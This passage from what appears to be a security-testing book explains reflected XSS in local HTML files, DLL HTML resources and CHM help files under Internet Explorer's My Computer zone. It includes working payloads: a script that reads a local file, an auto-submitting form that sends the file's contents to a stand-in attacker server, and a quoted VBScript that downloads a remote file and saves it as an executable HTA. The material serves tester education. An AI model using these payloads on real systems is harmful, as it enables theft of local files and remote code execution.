On most systems, the operating system and applications install thousands of HTML files on the local hard disk, in addition to the temporary files used by the Web browser. The files are mostly used for product help and templates used to dynamically create UI inside an application. When people think of HTML files on the local hard disk, they mostly think of files with the .htm or .html extension. HTML files are also located inside of other files. Windows binary files can contain HTML resources; this resource type allows HTML files to be stored inside the binary. Another place HTML files are located is inside Compiled Help Module (CHM) files, which have the .chm extension and are usually used for Help content.
These three types of files (.htm/.html files, HTML resources, and CHM files) can contain XSS bugs . In the reflected XSS examples discussed so far, the server has echoed attacker input in the HTML returned to the client. This is most commonly done by sever-side scripting languages such as Perl, Active Server Pages (ASP), or PHP: Hypertext Preprocessor (PHP). Because local files are not run through a server-side script interpreter how can a local HTML file contain a reflected XSS bug? The HTML file can contain script that rewrites its own contents and can echo user -supplied data.
Data sent to local HTML files will generally be sent through the URL. Forms using the POST method send the form variables at the end of an HTTP packet. Because viewing HTML files on the local hard disk doesn t use HTTP, posting data to these files won t be very useful in testing. Data sent to local HTML files is usually sent by appending a question mark or hash mark (#) to the local HTML file s filename followed by the data. Here s an example to clarify.
Load localHello.html (which you can find on the companion Web site) in your Web browser. After you enter the filename, insert the hash mark (#) followed by your name. As shown in Figure 10-9, your name will be visible in the local HTML file.
View the source of localHello.html. When you examine the source of the document, you see that the name entered after the hash mark isn t present. What s going on? Somehow the HTML contained the name because it is displayed it in the browser. This requires a closer look at the page s source (see Figure 10-10). The script in the page contains a variable named strName . This variable is set with the value of the browser s hash ( location.hash ), excluding the first character in location.hash . (The first character is always the hash mark, and the programmer of the page didn t want to echo that character.) Later in the script, the new contents are written to the HTML displayed (through the DOM) using the document.write method. In this case, Hello, Tom was written. The browser displays the modified HTML content allowing you to see Hello, Tom in the browser window.
With an understanding of the source code of this file, you know the untrusted data isn t encoded or filtered. Anything placed in the URL after the hash mark is echoed. The programmer likely didn t realize reflected XSS is possible through files on the local hard disk. Try sending in <SCRIPT>alert('Hi!')</SCRIPT> as the data following the hash mark. Bingo! Script runs.
Before we discuss why XSS bugs in local files are an issue, you must understand the first steps in exploiting these issues. In XSS bugs in Web servers, the attacker coerces the victim into navigating to a URL that contains the XSS bug. The attacker knows the full URL to the buggy page (example: http://server/buggy.aspx ). Everyone can access the page at the same URL. This is good for attackers because they will always know where to point the victim. Much like an XSS bug on a Web server, to exploit an XSS bug in a local file attackers must point the victim to the URL of the buggy file. Unfortunately for attackers, the URL containing the XSS bug varies from system to system; for example, on one attacker s machine it might be C:\SomeCoolProgram\buggy.html, but on another attacker s machine it might be something different such as D:\SomeCoolProgram\buggy.html. The directory names might also be different. How can attackers deal with this? First, most users accept the default installation directory for a program. If a program suggests SomeCoolProgram as the install directory, most users will install to that directory. Also, most people install programs to the C drive. Information disclosure bugs, discussed in Chapter 7, Information Disclosure, might be used in combination with local XSS bugs to help attackers determine where buggy files live on a victim s hard disk.
Although there probably aren t cookies or user data issued for the local file system, an attacker can still cause harm by exploiting a local XSS bug ”often more harm than attackers can cause with an XSS bug in a Web application. Local XSS bugs enable an attacker s code to run in the My Computer zone, which has the most lax security settings, which is why attackers are quite happy when they discover a local XSS issue. Less security means more fun for attackers.
Remember that an XSS bug can access the DOM of all other pages for the same site. (If you missed it, this information is in the sidebar titled XSS Enables Actions That Are Normally Prohibited earlier in this chapter.) In the My Computer zone, there isn t the notion of domain or site. All of the My Computer zone is treated as the same entity, which means that any page in the My Computer zone can access any other page in this zone through the DOM (file system permissions still apply). Once in the My Computer zone, attackers can read other fileson the local hard disk. Attackers need to know the path of a file they want to look into, but often this isn t a huge issue. Suppose there is a file on the victim s machine named C:\SercetPlans.txt, which contains secret plans. The following script grabs the contents of C:\SecretPlans.txt and displays it in a dialog box:
<SCRIPT> var x=window.open('file://c:/SecretPlans.txt','myWindow'); while (x.document.readyState !='complete') ; var strSecretText=x.document.body.innerText; x.close(); alert(strSecretText); </SCRIPT>
If someone with permissions to C:\SecretPlans.txt loads the preceding script, that script will have access to read the file. In the example of exploiting XSS bugs on servers, the contents of the victim s cookie were copied by appending the cookie s value to a URL pointing to the attacker s Web server. The same approach can be used to exploit local XSS bugs, too. However, there are two problems with appending the victim s data to a URL: first, because this is using the GET method the data size is limited to the amount of data that can be contained in the URL. The second problem is that if the victim happens to look in the browser history, the data would look extremely suspicious sitting in the address of a Web page on the attacker s server. Attackers would rather make victims lives simple and not complicate them with such worries. An alternative to sending the data in the URL is to send it through an HTML form using an HTTP POST. Sending the data in this way is not limited to local XSS exploits; it can also be used in server XSS exploits, and in script injection exploits against local files (persistent XSS against local files).
To steal the contents of C:\SecretPlans.txt, an attacker can echo an HTML form and script through a page containing the reflected XSS flaw. The attacker-supplied script will fill out the form using the contents of C:\SecretPlans.txt and will automatically submit the form to the attacker s server. The resulting form and script will look something like this:
<FORM action="http://AttackersServer/redir.asp" name="myForm" method="POST"> <INPUT type="hidden" name="txtSecretText" id="idText"> </FORM> <SCRIPT> var x=window.open('file://c:/SecretPlans.txt','myWindow'); while (x.document.readyState !='complete') ; idText.Value=x.document.body.innerText; x.close(); idText.submit(); </SCRIPT>
To exploit the localHello.html example to copy the contents of C:\SecretPlans.txt from the victim s hard drive to the attacker s Web server, the attacker must coerce the victim to browse to the following URL:
C:\XSSDemos\localHello.html#<FORM action="http://AttaclersServer/redir.asp" name="myForm" method="POST"><INPUT type="hidden" name="txtSecretText" id="idText"> </FORM><SCRIPT>var x=window.open('file://c:/SecretPlans.txt','myWindow');while (x.document.readyState !='complete');idText.Value=x.document.body.innerText; x.close();idText.submit();</SCRIPT>
Tip | Depending on the security settings, Internet Explorer might display the Information bar warning the user that active content has been restricted. For this demonstration, you can click the Information bar and select to allow the blocked content. As you ll see in the section titled Understanding How Internet Explorer Mitigates XSS Attacks against Local Files later in this chapter, this restriction doesn t always exist, and attackers have ways of working around it when it does exist. |
Internet Explorer zones | Internet Explorer loads content in one of the following zones (listed from most restrictive to least restrictive ):
|
Important | In Microsoft Windows XP Service Pack 2 (SP2), a more restrictive version of the My Computer zone is introduced. This new version locks down the My Computer zone and doesn t allow script or ActiveX controls to run. In Windows XP SP2 and later, there are two versions of the My Computer zone ”the original version and the more restrictive version. This is discussed in the section titled Changes in Internet Explorer in Windows XP SP2 later in this chapter. |
Another fun thing about the My Computer zone is that several ActiveX controls normally blocked from the Internet can be called. Developers of these controls sometimes allow potentially dangerous functionality when the Web page calling the control is in the My Computer zone because they believe only trusted code should be in this zone. In theory, this is correct, but with a single local XSS or local script injection bug an attacker can call into the control.
Microsoft added additional restrictions to some controls that allowed dangerous behavior when called from the My Computer zone because once an attacker could run script in the My Computer zone these controls were being used to run arbitrary code on a victim s machine. One of these controls is Shell.Application, which contains an Open method that takes a parameter named vDir . The vDir parameter can be the path to an executable file such as an .exe file. When the Open method is invoked, the executable specified in vDir is launched.
More Info | ActiveX controls called from HTML pose another set of security problems not discussed in this chapter. For more details and a more in-depth look at the ActiveX technology see Chapter 18. |
At the time of this writing, the ADODB.Connection controls (when hosted in the My Computer Zone) can be used to write files to arbitrary files on the local hard disk. A person named Http-equiv wrote code similar to the following script that downloads http://www.example.com/remoteFile.txt and writes the contents locally as C:\localFile.hta (HTA files are HTML applications that have no security restrictions; HTA files should be regarded as similar to running EXE files):
<script language="vbs"> 'http://www.malware.com - 19.10.04 Dim Conn, rs Set Conn = CreateObject("ADODB.Connection") Conn.Open "Driver={Microsoft Text Driver (*.txt; *.csv)};" & _ "Dbq=http://www.example.com;" & _ "Extensions=asc,csv,tab,txt;" & _ "Persist Security Info=False" Dim sql sql = "SELECT * from foobar.txt" set rs = conn.execute(sql) set rs =CreateObject("ADODB.recordset") rs.Open "SELECT * from remoteFile.txt", conn rs.Save "C:\localFile.hta", adPersistXML rs.close conn.close </script>
The HTA could be placed in the location of the attacker s choice. Placing it in the victim s startup group would result in execution next time the victim logs on. More on Http-equiv s code is available in his mail to the Full-Disclosure mailing list (see http://lists.grok.org.uk/pipermail/full-disclosure/2004-October/027778.html ).
Binary files can contain resources. Commonly used resources are bitmaps, cursors , dialog boxes, HTML, and string tables. HTMLResExample.dll, included on this book s companion Web site, is an example that contains an HTML resource. HTML resources can contain XSSbugs.
Programs usually call the LoadResource Windows API to retrieve the content of a resource. This API cannot be called through HTML script. The Windows operating system has a res pluggable protocol used to load HTML resources in Internet Explorer from arbitrary files. To read a resource from a file using the res protocol, the following syntax is used:
res://fileName[/resourceType]/resourceID.
The resourceType is optional; the default is type 23 (HTML). For example, the HTML resource named dnserror.htm in shdoclc.dll is displayed by visiting res://C:\Windows\System32\ shdoclc.dll/dnserror.htm . You ve probably seen this resource before; it is used by Internet Explorer when your browser encounters a DNS error. The bitmap resource named 533 in the same file can be viewed through res://C:\Windows\System32\shdoclc.dll/2/533 , as shown in Figure 10-11. The full path to the resource file isn t required if it is located in the current path.For example, the bitmap resource in shdoclc.dll can also be loaded with the URL res://shdoclc.dll/2/533 .
It turns out that HTML specified in resources can also be exploited by attackers and should be tested for local XSS attacks. The root cause of the vulnerability in the case of resources is identical to the problem exhibited in HTML files on the local file system. The only difference is how the buggy HTML file is accessed: instead of the attacker getting the victim to browse directly to an HTML file that contains an XSS bug on the local hard file system, the attacker gets the victim to load an HTML resource that contains an XSS bug through the res pluggable protocol.
Many tools can be used to examine resources contained in binary files on the Windows platform. If you don t already have a program to examine resources, you can download Resource Hacker ( http://angusj.com/resourcehacker/ ), which is a freeware utility whose sole purpose is viewing and manipulating resources. Microsoft Visual Studio is one that might already be installed on your machine. Visual Studio shows HTML resources under the HTML folder, but other programs (such as Resource Hacker) might show HTML resources under a folder named 23 (which is the internal ID for HTML resources defined in winuser.h).
Examining HTML resource 102 inside HTMLResExample.dll shows that its HTML is identical to the HTML in the previous example (localHello.html) except that the HTML is contained in the DLL. Because a simple URL to run script through localHello.html was file://D:/XSSDemos/localHello.html#<SCRIPT>alert("Hi!")</SCRIPT> , a URL to run simple script through HTMLResExample.dll is res://D:/XSSDemos/HTMLResExample.dll/ 102#<SCRIPT>alert("Hi!")</SCRIPT> . Now code is running in the My Computer zone!
Another type of file to test for local XSS bugs are Compiled Help Module (CHM) files, which end with the .chm extension. Compiled Help files are a set of HTML files bundled together inone CHM file. To examine the contents of a CHM for potential XSS bugs, dump its contents to disk. Microsoft has a free tool, called HTML Help Workshop, available from http://msdn.microsoft.com/library/en-us/htmlhelp/html/hwMicrosoftHTMLHelpDownloads.asp , that can be used either to create or decompile Compiled Help files. It can be used to decompile a CHM so that all of the individual files contained inside of the CHM are easy to examine.
After you start HTML Help Workshop, select the Decompile option on the File menu to extract the individual HTML files. In the dialog box that appears, enter the name of the CHM and the directory where the decompiled contents of the CHM file should be stored.
Note | Use the CHMDemo.chm file included on the companion Web site to experiment with decompiling a CHM file. |
Look at the source of the three files extracted from CHMDemo.chm. The file named index.html doesn t seem very interesting because it contains only frames that point to the other two files. Look at SearchForm.html; this file is a little more interesting. It asks the user for a search term and has a Search button that contains an onclick event. When the button is clicked, the following script is executed:
parent.frames[1].location = "searchResults.htm#" + txtKey- word.value;parent.frames[1].location.reload();
What can an attacker do with this? Although it might not immediately appear like there is anything interesting an attacker can do, notice that the pages are passing data to each other using the hash. The third and most interesting file contained in the CHM is searchResults.htm. This file contains the following HTML fragment:
var strKeyword = new String(location.hash); strKeyword = strKeyword.substring(1); document.open(); document.write ("<font face=\"Tahoma\" size=\"2\">"); if(location.hash == "") { document.write ("Please enter a search term on the left and click \"Search\"."); } else { document.write ("Search results for ""); document.write (strKeyword); document.write (""<BR>No information about that topic."); }
This page writes out the document.hash as long as it isn t the empty string. There isn t any validation, so it should be possible to send script as the hash and have it run in the My Computer zone. But how can an attacker construct a URL that points to searchResults.htm inside of the CHM?
Much like with HTML resources, there is a way to load a specific page of a CHM inside Internet Explorer by using a pluggable protocol. There are actually three pluggable protocols that provide this functionality: ms-its , its , and mk . The following are examples of how to run script through CHMDemo.chm using each pluggable protocol.
ms-its:c:\xss\CHMDemo.chm::/searchResults.htm#<SCRIPT>alert('Hi!');</SCRIPT>
its:c:\xss\CHMDemo.chm::/searchResults.htm#<SCRIPT>alert('Hi!');</SCRIPT>
mk:@MSITStore:C:\XSS\CHMDemo.chm::/searchResults.htm#<SCRIPT>alert('Hi!'); </SCRIPT>
Unlike the examples in the beginning of this chapter, the HTML isn t being generated on the server and displayed on the client. The output is being generated on the client and the input data will not appear in the HTML source. How can these bugs be found? The previous approach of looking for the input in the HTML source returned and trying to figure out how to get script run won t work. It is necessary to review the client-side script. Client-side script mostly appears inside <script> tags or is files included by using the src property on the <script> tag. For example, <SCRIPT src= http://www.example.com/common.js ></SCRIPT> includes the code in common.js as if it was contained in the calling HTML page. Client-side script can be included in many other places such as events on an HTML tag and HTML Styles, but the most common will be the <script> tag. By carefully looking at the client-side script, you will be able to identify XSS bugs in the code.
Note | It is important to note that client-side script generating output doesn t only happen in files installed on the local hard disk. Web sites can also contain client-side script that dynamically generates output and therefore can also contain XSS bugs in this category. An XSS bug in client-side script contained in a Web site will not run in the My Computer zone but instead will run in the security context of the site that referenced the script. For example, if www.example.com contained the previous example file localHello.html in the site ( http://www.example.com/localHello.html ), an attacker could get the victim to run script by coercing the victim to browse to http://www.example.com/localHello.html#<SCRIPT>alert('Hi!')</SCRIPT> . This example script isn t terribly interesting because it simply tells the victim Hi! but it has access to anything example.com has access to through script. |
Although it is very difficult to make a complete list of all dangerous code that leads to an XSS condition, Table 10-3 describes a few elements you must investigate carefully if they are present in client-side scripts.
Property | Description |
---|---|
Reading location.hash | This property contains any data after the page s URL following thehash mark (#). The data after the hash mark can be set to an arbitrary value. |
Reading location.search | This property contains any data after the page s URL following the question mark (?). The data after the question mark can be set to anarbitrary value. |
Reading document.location / location.href | Entire URL of the page. This property includes the location.search and location.hash. If a URL is http://www.example.com/foo.html?abc#123 , the document.location includes the entire URL. The problem is that programmers only expect URLs like http://www.example.com/foo.html . The programmer makes assumptions that the document.hash and document.search won t be present or doesn t realize that they could be included in the document.location. Programmers might think that the data following the last forward slash of the URL is the name of the page. This isn t the case! Suppose there is a page containing script that dynamically redirects to another file inside a directory with the same name. For example, if the file was named test1.html, the redirection would be to test1/file.html. If the programmer of the page thought the last forward slash in the document.location was immediately before the name of thepage and makes the redirection based on that logic, script canrun. An attacker could force the victim to load C:\buggy.html#\ javascript:alert("Hi! );/.html/ . Then the victim would be redirected to javascript:alert("Hi! );///file.html and the attacker s code wouldrun. |
Setting document.location | Resetting this property forces the browser to load a URL. If you cancontrol this data, you might be able to get script run by navigating to a URL that begins with a scripting protocol like javascript:alert("Hi!"); . |
Setting outerHTML / innerHTML | These properties are used to rewrite parts of the DOM. If you can control the data that is being rewritten, you might be able to get script to run. |
Setting href / src | If the page is dynamically setting the HREF of src of a tag, script can likely run by using a scripting protocol. The HREF and src are the common attributes, but scripting protocols apply to most places that accept a URL as a value. |